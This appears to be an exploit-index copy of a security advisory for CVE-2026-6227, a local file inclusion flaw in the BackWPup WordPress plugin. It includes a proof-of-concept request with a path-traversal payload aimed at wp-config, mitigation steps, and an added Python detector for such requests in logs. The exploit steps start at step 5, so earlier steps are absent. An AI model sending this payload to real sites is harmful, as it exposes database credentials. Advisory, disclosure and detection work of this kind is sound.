## https://sploitus.com/exploit?id=C53E65E6-9E7C-53AA-A7C1-4E627243A4DE
# CVE-2026-6227: Local File Inclusion in BackWPup

![CVSS](https://img.shields.io/badge/CVSS-7.2%20High-red)
```http
Cookie: wordpress_logged_in_=

block_name=....//....//....//....//wp-config&block_type=component&block_data%5Btype%5D=success&block_data%5Bfont%5D=small&block_data%5Bdismiss_icon%5D=true&block_data%5Bcontent%5D=You+scheduled+a+new+backup+successfully!
```

5. Observe the response to verify file inclusion behavior.

## Timeline
- 2026-03: Vulnerability reported to vendor
- 2026-03-25: Vendor patch released in 5.6.7
- 2026-04-13: Public disclosure (CVE-2026-6227)

## Mitigation
- Update BackWPup to version 5.6.7 or later
- Restrict assignment of `backwpup` capability to trusted roles only
- Review audit logs for suspicious access to `/wp-json/backwpup/v1/getblock`
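As an added example (not code from this advisory or from the BackWPup project), a small detector for the log-review step above: it flags requests to the `getblock` endpoint whose `block_name` parameter contains traversal sequences, including the `....//` form used in the PoC that survives a single non-recursive `../` strip. The sample records are constructed; the body field assumes a log source that records POST parameters (a WAF or application log, since a plain access log does not).

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

GETBLOCK_PATH = "/wp-json/backwpup/v1/getblock"
# Matches "../", "..\" and the "....//" form from the advisory's PoC, which
# collapses to "../" after one non-recursive removal of "../".
TRAVERSAL_RE = re.compile(r"(\.\./|\.\.\\|\.{4}//)")

# Constructed sample records: (client IP, method, request target, body).
# Body content is assumed to come from a WAF or application log
# (assumption for this example; access logs do not carry POST bodies).
SAMPLE_LOG = [
    ("203.0.113.5", "POST", "/wp-json/backwpup/v1/getblock",
     "block_name=....//....//....//....//wp-config&block_type=component"),
    ("203.0.113.6", "POST", "/wp-json/backwpup/v1/getblock",
     "block_name=notice&block_type=component"),
    ("203.0.113.7", "GET",
     "/wp-json/backwpup/v1/getblock?block_name=..%252F..%252Fwp-config", ""),
    ("203.0.113.8", "GET", "/wp-json/wp/v2/posts", ""),
]

def fully_decode(value: str, rounds: int = 3) -> str:
    """Undo repeated percent-encoding so %252F is seen as '/'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_suspicious_getblock(method: str, target: str, body: str) -> bool:
    """True if the request hits getblock with a traversal-looking block_name."""
    parts = urlsplit(target)
    if parts.path.rstrip("/") != GETBLOCK_PATH:
        return False
    params = parse_qs(parts.query, keep_blank_values=True)
    if method.upper() == "POST" and body:
        params.update(parse_qs(body, keep_blank_values=True))
    for name in params.get("block_name", []):
        if TRAVERSAL_RE.search(fully_decode(name)):
            return True
    return False

def scan(records):
    """Return the client IPs of records that look like traversal attempts."""
    return [ip for ip, method, target, body in records
            if is_suspicious_getblock(method, target, body)]
```

Running `scan(SAMPLE_LOG)` returns the two source addresses whose `block_name` decodes to a traversal path; benign `getblock` calls and other REST routes are not reported.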

## References
- Vendor plugin page: https://wordpress.org/plugins/backwpup/
- CVE reference (Wordfence): https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/backwpup/backwpup-566-authenticated-administrator-local-file-inclusion-via-block-name-parameter